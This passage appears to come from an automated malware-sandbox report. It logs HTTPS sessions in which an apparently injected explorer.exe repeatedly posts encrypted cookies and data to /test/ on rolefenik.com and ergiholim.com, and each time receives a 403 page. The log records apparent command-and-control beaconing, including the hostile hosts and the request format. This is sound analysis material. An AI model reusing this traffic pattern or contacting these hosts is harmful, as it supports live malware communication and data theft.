                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HjccpWFZ2%2BSO3q7Tf0NB4hxSNVvPs5%2FO0GPYhl3V%2FGZ40642403UL%2B81Ktxplc4LLHKemvBRWZxon68%2BvaPxzfDMxNOuSd0hN4djUztdDAO4fNxgMs4Q2K2iZEIGe4e1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070b00bc1e375-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=152280&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=18737&cwnd=32&unsent_bytes=0&cid=dc5a5657835f4ce6&ts=561&x=0"
                                                                                                                                          2024-11-13 17:21:47 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:21:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          8192.168.2.649996104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:21:48 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:48 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:21:49 UTC747INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:48 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zew1z8nhqT7Mps836AToGZCOSuKUIhmI%2BkmFNSyvpeVX7pbAZqOU8cc4NM0GdP8qcy769dILlYhLYo8msyz74AJlYk1UH%2BQX4RxLBXN6SWpGTSt1dKAit3bP7gjNP81W"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070b759fbe7bb-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1182&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=2494401&cwnd=251&unsent_bytes=0&cid=e116614cf5528425&ts=458&x=0"
                                                                                                                                          2024-11-13 17:21:49 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:21:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          9192.168.2.649997104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:21:50 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:50 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:21:50 UTC754INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:50 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H9RBqCEpsJKUB%2FQrKMYVUwOqrqSTQo2vXTrKhY2HbSTd5GJRD5rQo%2Fb1tC8afRJv%2FbJZQ033hPMPDmKlz%2FeYorlRTsBOSIWlT%2BgnSq5eNI6MOjvSGoI%2BGufFKlfiAjTs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070c07f6fe38e-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=148683&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=18751&cwnd=32&unsent_bytes=0&cid=5395202ae9657594&ts=837&x=0"
                                                                                                                                          2024-11-13 17:21:50 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:21:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          10192.168.2.649998104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:21:51 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:51 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:21:52 UTC746INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:52 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iNrGzA4RClqk3Zu5u%2FMf8hLl1SIFqqSMfqaf%2BIEm8wZIgoUm11bHGdri1SJFcFXrgR5z1bhzpXXCyDDHPELuB28zw72BszNWuIjjs5EydDGVTfRoySMFuYnbBDxz6X9O"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070cb49c0f62d-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=139803&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=22149&cwnd=32&unsent_bytes=0&cid=04e37b94cd00d38d&ts=723&x=0"
                                                                                                                                          2024-11-13 17:21:52 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:21:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          11192.168.2.650000104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:21:55 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:55 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:21:55 UTC750INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:55 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5E10ETFR%2BTlXuEai8SejHu6VpoufOU8kUaplQ6%2FvUBi56yf9nJiOlj0GVIj%2F%2B1Kr4gOb1I9bjFuAM2AAD5nLCFdETvP6p5bYL67UxhgjkCVZfg7CYxtCLtvvf3sDEo4S"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070e12e0ad75f-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=143441&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=19733&cwnd=32&unsent_bytes=0&cid=23631287cfa01ef7&ts=740&x=0"
                                                                                                                                          2024-11-13 17:21:55 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:21:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          12192.168.2.650001104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:21:56 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:56 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:21:57 UTC748INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:57 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8x9n4JZicwJdQHhf44iZq62bQR4PclbBYS0htN0z0UmCSMSHiqp2QJ4PjYCKKEj5xA3y%2BznPyo7blneijvou0nJg8laRd2zTyoIYi1rSovLNVoukMKJ3Gf%2Bvvs5%2BRK5h"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070eb2e12deb5-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=130660&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=22172&cwnd=32&unsent_bytes=0&cid=f28166e97db29f7b&ts=668&x=0"
                                                                                                                                          2024-11-13 17:21:57 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:21:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          13192.168.2.650003104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:21:58 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:58 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:21:59 UTC752INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:59 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TMaY3Vd5xWzms0rNmLkSR80nBpc8uNQbOBXENpzh4PsVuG9NKeyli6BcFwKQWmf3mLGSAbNJ%2BeMUoIu9I%2BET5sEZWs9C1u5paPlZP%2Bx%2BQE4%2FhKeMzruVobkNwNui1coO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070f55841ca1f-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=160357&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20599&cwnd=32&unsent_bytes=0&cid=0a46d277ad3e968c&ts=742&x=0"
                                                                                                                                          2024-11-13 17:21:59 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:21:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


